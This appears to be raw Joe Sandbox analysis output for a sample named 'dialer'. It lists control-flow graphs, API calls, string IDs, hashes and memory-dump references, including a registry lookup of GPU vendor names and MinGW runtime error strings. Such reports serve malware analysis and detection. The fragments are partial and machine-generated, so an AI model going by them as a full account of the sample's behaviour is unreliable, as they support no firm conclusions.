                                                                                                                            • Instruction Fuzzy Hash: 21A28F61E0C68694FB21EB24E6103BAF7A1FB55744FC84035CA8C477A6EF7EA145C722

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 245 7ff75e9413b8-7ff75e9413f7 246 7ff75e9413f9-7ff75e94141b call 7ff75e941335 245->246 247 7ff75e941420-7ff75e941427 245->247 246->247 249 7ff75e941459-7ff75e9414b6 call 7ff75e94138a 247->249 250 7ff75e941429-7ff75e941430 247->250 255 7ff75e9414b8-7ff75e9414eb call 7ff75e941335 249->255 256 7ff75e9414f0-7ff75e9414fe 249->256 251 7ff75e941437-7ff75e941450 250->251 251->251 253 7ff75e941452 251->253 253->249 255->256 258 7ff75e941529-7ff75e9415c4 call 7ff75e94138a call 7ff75e943106 256->258 259 7ff75e941500-7ff75e941503 256->259 266 7ff75e94163d-7ff75e941670 call 7ff75e943115 258->266 267 7ff75e9415c6-7ff75e9415c8 258->267 261 7ff75e941507-7ff75e941520 259->261 261->261 262 7ff75e941522 261->262 262->258 271 7ff75e9415cd-7ff75e941639 call 7ff75e943106 266->271 272 7ff75e941676 266->272 268 7ff75e941934-7ff75e941947 267->268 277 7ff75e94167b-7ff75e9416a2 call 7ff75e943124 271->277 278 7ff75e94163b 271->278 274 7ff75e94192a-7ff75e94192f call 7ff75e942ff5 272->274 274->268 282 7ff75e9416a8-7ff75e9416db 277->282 283 7ff75e94191b-7ff75e941920 call 7ff75e942ff5 277->283 278->266 284 7ff75e94170a-7ff75e941711 282->284 285 7ff75e9416dd-7ff75e941705 call 7ff75e941335 282->285 290 7ff75e941925 283->290 288 7ff75e941740-7ff75e941755 _wcsnicmp 284->288 289 7ff75e941713-7ff75e94171a 284->289 285->284 292 7ff75e941757-7ff75e94176d call 7ff75e942ff5 * 2 288->292 293 7ff75e941772-7ff75e941779 288->293 291 7ff75e94171e-7ff75e941737 289->291 290->274 291->291 296 7ff75e941739 291->296 292->268 294 7ff75e94177b-7ff75e94179d call 7ff75e941335 293->294 295 7ff75e9417a2-7ff75e9417a9 293->295 294->295 299 7ff75e9417d8-7ff75e9417ed _wcsnicmp 295->299 300 7ff75e9417ab-7ff75e9417b2 295->300 296->288 299->292 303 7ff75e9417f3-7ff75e9417fa 299->303 302 7ff75e9417b6-7ff75e9417cf 300->302 302->302 305 7ff75e9417d1 302->305 306 7ff75e941827-7ff75e94182e 303->306 307 7ff75e9417fc-7ff75e941822 call 7ff75e941335 303->307 305->299 310 7ff75e94185d-7ff75e941876 _wcsnicmp 306->310 311 7ff75e941830-7ff75e941837 306->311 307->306 310->292 313 7ff75e94187c-7ff75e9418a8 310->313 312 7ff75e94183b-7ff75e941854 311->312 312->312 316 7ff75e941856 312->316 314 7ff75e9418aa-7ff75e9418ce call 7ff75e941335 313->314 315 7ff75e9418d2-7ff75e9418d9 313->315 314->315 318 7ff75e941908-7ff75e941915 wcsstr 315->318 319 7ff75e9418db-7ff75e9418e2 315->319 316->310 318->283 318->292 321 7ff75e9418e6-7ff75e9418ff 319->321 321->321 322 7ff75e941901 321->322 322->318
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsnicmp$wcsstr
                                                                                                                            • String ID: 0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$ProviderName$Q$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                                                                            • API String ID: 950242380-3899023574
                                                                                                                            • Opcode ID: 6b827fd31cd5814922cc61e0589ffdacb0496c5d1af6198efbe5993131eaedc8
                                                                                                                            • Instruction ID: c90f79ccde235d64f4f2f317582106305fbcd3cd31ad29db3adbdd8c85735e35
                                                                                                                            • Opcode Fuzzy Hash: 6b827fd31cd5814922cc61e0589ffdacb0496c5d1af6198efbe5993131eaedc8
                                                                                                                            • Instruction Fuzzy Hash: 6FE16E22E0C78695FB20EB25EA113EAB7A1FB44344F884035DA8C47796EF7DE145C722

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$ErrorLastProtectQuery
                                                                                                                            • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                            • API String ID: 637304234-2693646698
                                                                                                                            • Opcode ID: 4c0e7fca995c04cc817b1d3d9dbcb799d863063232bca01154bdc81abab6207f
                                                                                                                            • Instruction ID: 58b9b22a2dd91aecf10ee46fb1d7f1341cf907cd8ecc7834bca98dbd561332ac
                                                                                                                            • Opcode Fuzzy Hash: 4c0e7fca995c04cc817b1d3d9dbcb799d863063232bca01154bdc81abab6207f
                                                                                                                            • Instruction Fuzzy Hash: 6B31BD71F09A0285EA10EF25EA451B8A3A2FB88B94FCC8135DE0D07794EF3DE441C762

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 448 7ff75e941b49-7ff75e941b94 449 7ff75e941b99-7ff75e941bbd call 7ff75e9430ee 448->449 452 7ff75e941bbf-7ff75e941be3 call 7ff75e943046 449->452 453 7ff75e941be5-7ff75e941be7 449->453 452->449 454 7ff75e941bed-7ff75e941c03 453->454 455 7ff75e941d65-7ff75e941d87 call 7ff75e943061 453->455 458 7ff75e941c0d-7ff75e941c21 454->458 463 7ff75e941d89 455->463 464 7ff75e941d92-7ff75e941df8 call 7ff75e94309a call 7ff75e942d00 455->464 461 7ff75e941d4a-7ff75e941d50 458->461 462 7ff75e941c27-7ff75e941c50 458->462 461->455 467 7ff75e941d52-7ff75e941d5f 461->467 465 7ff75e941c8a-7ff75e941c91 462->465 466 7ff75e941c52-7ff75e941c85 call 7ff75e941335 462->466 463->464 480 7ff75e941dfa-7ff75e941e1f call 7ff75e941335 464->480 481 7ff75e941e24-7ff75e941e32 464->481 470 7ff75e941cbf-7ff75e941cd8 wcsncmp 465->470 471 7ff75e941c93-7ff75e941c9a 465->471 466->465 467->455 467->458 470->461 474 7ff75e941cda-7ff75e941d48 call 7ff75e94307c 470->474 473 7ff75e941c9e-7ff75e941cb6 471->473 473->473 476 7ff75e941cb8 473->476 474->455 474->461 476->470 480->481 483 7ff75e941e5c-7ff75e941e88 call 7ff75e941b25 call 7ff75e94138a 481->483 484 7ff75e941e34-7ff75e941e37 481->484 491 7ff75e941e8a-7ff75e941ea0 call 7ff75e94138a 483->491 492 7ff75e941ea2-7ff75e941ea8 483->492 486 7ff75e941e3b-7ff75e941e53 484->486 486->486 488 7ff75e941e55 486->488 488->483 494 7ff75e941eb0-7ff75e941eb3 491->494 492->494 496 7ff75e941ecd-7ff75e941ed5 494->496 497 7ff75e941eb5-7ff75e941ecb call 7ff75e94138a 494->497 499 7ff75e941edd-7ff75e941ef5 496->499 497->499 501 7ff75e941ef7-7ff75e941f0f wcslen 499->501 502 7ff75e941f11-7ff75e941f16 499->502 503 7ff75e941f1c-7ff75e94219d call 7ff75e94138a call 7ff75e943046 * 2 call 7ff75e94308b call 7ff75e943061 * 2 501->503 502->503
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcslenwcsncmp
                                                                                                                            • String ID: 0$X$`
                                                                                                                            • API String ID: 3763518489-2527496196
                                                                                                                            • Opcode ID: bf98eebd0c4874be657d4506fb91d11e86c2d1a510ff09434a144a75df8919a4
                                                                                                                            • Instruction ID: 0cdfcd99745f55e64ed120f01f2fb817c33d637abcb5e7b96b135d4ee2e1b59f
                                                                                                                            • Opcode Fuzzy Hash: bf98eebd0c4874be657d4506fb91d11e86c2d1a510ff09434a144a75df8919a4
                                                                                                                            • Instruction Fuzzy Hash: 2DF18F72A08BC181E3709B25E5403EAB7A1FB947A4F448225DAEC47BD9DF7DD184CB11

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 516 7ff75e9434fb-7ff75e943513 517 7ff75e943759-7ff75e943765 516->517 518 7ff75e943519-7ff75e94356a call 7ff75e943c14 call 7ff75e943d60 516->518 523 7ff75e943570-7ff75e943579 518->523 524 7ff75e94371f-7ff75e943728 518->524 526 7ff75e94358b-7ff75e94358e 523->526 527 7ff75e94357b-7ff75e943587 523->527 525 7ff75e94372c-7ff75e943732 524->525 525->517 530 7ff75e943734-7ff75e943745 525->530 528 7ff75e94359d-7ff75e9435a1 526->528 529 7ff75e943590-7ff75e94359b 526->529 527->526 532 7ff75e9435cf-7ff75e9435d9 528->532 533 7ff75e9435a3 528->533 531 7ff75e9435a5-7ff75e9435a8 529->531 534 7ff75e943747-7ff75e943752 VirtualProtect 530->534 535 7ff75e943754-7ff75e943757 530->535 531->524 536 7ff75e9435ae-7ff75e9435cd call 7ff75e9433b4 531->536 537 7ff75e9435db-7ff75e9435f0 532->537 538 7ff75e9435f2-7ff75e9435f9 532->538 533->529 534->535 535->525 536->531 540 7ff75e943649-7ff75e94364c 537->540 541 7ff75e943686 call 7ff75e943350 538->541 540->524 542 7ff75e943652-7ff75e94366b 540->542 547 7ff75e94368b-7ff75e94368e 541->547 545 7ff75e94366d 542->545 546 7ff75e9436b0-7ff75e9436b5 542->546 545->547 548 7ff75e94366f-7ff75e943672 545->548 551 7ff75e94360c-7ff75e943621 546->551 552 7ff75e9436bb-7ff75e9436be 546->552 549 7ff75e943679-7ff75e943682 547->549 550 7ff75e943690-7ff75e943693 547->550 553 7ff75e9435fe-7ff75e943604 548->553 554 7ff75e943674-7ff75e943677 548->554 549->541 550->551 555 7ff75e943627-7ff75e943634 551->555 556 7ff75e9436c3-7ff75e9436cf 551->556 552->551 553->551 560 7ff75e943606 553->560 554->549 559 7ff75e943698-7ff75e94369f 554->559 561 7ff75e94363a-7ff75e943644 call 7ff75e9433b4 555->561 562 7ff75e9436f9-7ff75e9436ff 555->562 557 7ff75e9436d1-7ff75e9436df 556->557 558 7ff75e9436e5-7ff75e9436f4 call 7ff75e943350 556->558 557->555 557->558 558->562 559->551 566 7ff75e9436a5-7ff75e9436ab 559->566 560->551 561->540 562->561 565 7ff75e943705-7ff75e94370e 562->565 565->561 567 7ff75e943714-7ff75e94371a 565->567 566->551 567->561
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,00007FF75E94BA38,00000000,?,?,?,00007FF75E94BA30,00007FF75E941208,?,?,?,00007FF75E941313), ref: 00007FF75E943752
                                                                                                                            Strings
                                                                                                                            • Unknown pseudo relocation bit size %d., xrefs: 00007FF75E94367B
                                                                                                                            • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF75E9436ED
                                                                                                                            • Unknown pseudo relocation protocol version %d., xrefs: 00007FF75E9435F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                            • API String ID: 544645111-1286557213
                                                                                                                            • Opcode ID: 6d2756cb95d16e08724b8ec44e49268cac4bd7fa9b888f6af2c99903510c2466
                                                                                                                            • Instruction ID: 0f92c3885b1bc0119d5909377009d0d8bcdab8a1491f4e9b10d05e8710da05c0
                                                                                                                            • Opcode Fuzzy Hash: 6d2756cb95d16e08724b8ec44e49268cac4bd7fa9b888f6af2c99903510c2466
                                                                                                                            • Instruction Fuzzy Hash: D061BE62F0864295FB24EB35D6462B8A7A0BF44B98F8C8131DA1D07BD5DF3DE581C722

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 568 7ff75e9437b4-7ff75e9437dc 570 7ff75e9437de-7ff75e9437e2 568->570 571 7ff75e9437e4-7ff75e9437e9 568->571 570->571 572 7ff75e943831-7ff75e943834 570->572 573 7ff75e9438e7-7ff75e9438f1 571->573 574 7ff75e9437ef-7ff75e9437f4 571->574 577 7ff75e943901-7ff75e943907 572->577 578 7ff75e9438ff 573->578 579 7ff75e9438f3-7ff75e9438fb 573->579 575 7ff75e94380c-7ff75e943814 574->575 576 7ff75e9437f6-7ff75e9437fb 574->576 575->572 582 7ff75e943816-7ff75e943821 575->582 580 7ff75e9437fd 576->580 581 7ff75e943845-7ff75e943855 call 7ff75e943e80 576->581 578->577 579->578 583 7ff75e94382a-7ff75e94382f 580->583 584 7ff75e9437ff-7ff75e943804 580->584 591 7ff75e943857-7ff75e943861 581->591 592 7ff75e943863-7ff75e94386b 581->592 582->583 583->572 587 7ff75e943839-7ff75e94383e 583->587 584->573 586 7ff75e94380a 584->586 586->572 589 7ff75e943840 587->589 590 7ff75e94386f-7ff75e94387f signal 587->590 589->573 594 7ff75e943892-7ff75e94389a 590->594 595 7ff75e943881-7ff75e943886 590->595 596 7ff75e94388b-7ff75e943890 signal 591->596 592->573 593 7ff75e94386d 592->593 597 7ff75e9438e0-7ff75e9438e2 593->597 594->573 598 7ff75e94389c 594->598 595->596 596->572 597->572 598->597
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: signal
                                                                                                                            • String ID: CCG
                                                                                                                            • API String ID: 1946981877-1584390748
                                                                                                                            • Opcode ID: 2d778218463b6a2644a9b9654bbee096ef51d4d78e2cedb306f439b0da448852
                                                                                                                            • Instruction ID: db35a0c98b5fc6f4e19232c828df8949fa61e7f12b2cfc28bd97daa6ce0473f8
                                                                                                                            • Opcode Fuzzy Hash: 2d778218463b6a2644a9b9654bbee096ef51d4d78e2cedb306f439b0da448852
                                                                                                                            • Instruction Fuzzy Hash: A1217C61E0D14282FB78B23596813BCD182BF55764F9C8936D90E833D1DF1EA8819323

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 600 7ff75e943260-7ff75e943285 601 7ff75e943287-7ff75e943292 600->601 602 7ff75e9432cb-7ff75e943339 call 7ff75e943de0 fprintf 600->602 601->602
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fprintf
                                                                                                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                            • API String ID: 383729395-3474627141
                                                                                                                            • Opcode ID: 589ca410a5b83360197308b7ed17ba06b0d09163feadd3698f94838f3051e25e
                                                                                                                            • Instruction ID: 7e86e4e3795c688f9c19c5126b8bb17f9d7a12a19555cb3af6d36348a7d12891
                                                                                                                            • Opcode Fuzzy Hash: 589ca410a5b83360197308b7ed17ba06b0d09163feadd3698f94838f3051e25e
                                                                                                                            • Instruction Fuzzy Hash: E6115162C08E8482D311DF2CE4413EAB3B0FF9A755F945722EBC816624DF3AD152C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fprintf
                                                                                                                            • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                            • API String ID: 383729395-2187435201
                                                                                                                            • Opcode ID: bb0e9cb04218332e306efb3d1e0d4a509f838d58428ac9f6c3ae91d5ddaed728
                                                                                                                            • Instruction ID: ce9566f5e8d76d717d8203a10345d0076bb9ac12443fe45470c220328bb6509e
                                                                                                                            • Opcode Fuzzy Hash: bb0e9cb04218332e306efb3d1e0d4a509f838d58428ac9f6c3ae91d5ddaed728
                                                                                                                            • Instruction Fuzzy Hash: D2F01D66808F8482D211DF2CE4002EBB370FF9E789F645326EBC926624DF2DD542C710

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 605 7ff75e943297-7ff75e943339 call 7ff75e943de0 fprintf
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fprintf
                                                                                                                            • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                            • API String ID: 383729395-2713391170
                                                                                                                            • Opcode ID: 80c12c21b195a29f2f26e0ff6e964f92279c4d5a277077c4cb92da5b353aee2c
                                                                                                                            • Instruction ID: 0cc85210255d85834fdd2442cc5d6a520d7c37cf439ead99887fcfab83b49156
                                                                                                                            • Opcode Fuzzy Hash: 80c12c21b195a29f2f26e0ff6e964f92279c4d5a277077c4cb92da5b353aee2c
                                                                                                                            • Instruction Fuzzy Hash: 63F01D66808F8882D211EF28E4002ABB370FF9E789F645326EBC926664DF3DD552C710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fprintf
                                                                                                                            • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                            • API String ID: 383729395-4064033741
                                                                                                                            • Opcode ID: c2297662c0c337e4b165d6bf0dacfb9c46326693d3958f1b0d1ce1bd7cac4244
                                                                                                                            • Instruction ID: 2b5a63f8fbb24a1ea77cba49f7193ae5475112504e5be30292bf3229687b5b60
                                                                                                                            • Opcode Fuzzy Hash: c2297662c0c337e4b165d6bf0dacfb9c46326693d3958f1b0d1ce1bd7cac4244
                                                                                                                            • Instruction Fuzzy Hash: 8BF01D66808F8482D211DF28E4002ABB370FF9E789F645326EBCD26624DF2DD542CB10
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fprintf
                                                                                                                            • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                            • API String ID: 383729395-4283191376
                                                                                                                            • Opcode ID: 1b386bd2b03c1348818ddf3c84a533054eb9c2b894c45f8a032dfed0689c5345
                                                                                                                            • Instruction ID: 0fcf8d4c9b8bc547e19799f9f37a3d31a3a340af0b010afde377558f8712b039
                                                                                                                            • Opcode Fuzzy Hash: 1b386bd2b03c1348818ddf3c84a533054eb9c2b894c45f8a032dfed0689c5345
                                                                                                                            • Instruction Fuzzy Hash: 1CF01D66808F8482D211DF28E4002ABB371FF9E789F645326EBC926624DF2DD542CB10
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fprintf
                                                                                                                            • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                            • API String ID: 383729395-4273532761
                                                                                                                            • Opcode ID: c8df7b83e6f525c740f07ba842bee41caed6b735e9d131bcd7f03008dc688af2
                                                                                                                            • Instruction ID: de1ac79e2de1dfc37f68126d2318b39edf02c173fd6276aacfe7e41eb11c4c49
                                                                                                                            • Opcode Fuzzy Hash: c8df7b83e6f525c740f07ba842bee41caed6b735e9d131bcd7f03008dc688af2
                                                                                                                            • Instruction Fuzzy Hash: 8EF01D66808F8482D211EF28E4002ABB370FF9E789F645326EBC926664DF2DD542C710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
